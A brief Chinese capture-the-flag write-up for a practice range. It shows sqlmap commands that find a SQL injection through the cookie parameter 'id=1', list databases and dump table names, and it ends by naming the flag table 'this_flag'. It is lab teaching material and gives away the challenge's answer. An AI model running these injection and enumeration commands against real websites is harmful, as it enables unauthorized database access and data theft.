靶场地址:http://www.whalwl.host:8009
解题准备:本题需要使用sqlmap,kali自带
解题思路:
1、根据提示,添加cookie参数id=1,放到sqlmap中跑
sqlmap -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1" --dbms mysql --level 2
显示存在注入
2、继续爆库名
sqlmap -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1" --dbms mysql --level 2 --dbs
3、爆表名
sqlmap -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1" --dbms mysql --level 2 -D cookie --tables
4、答案在this_flag中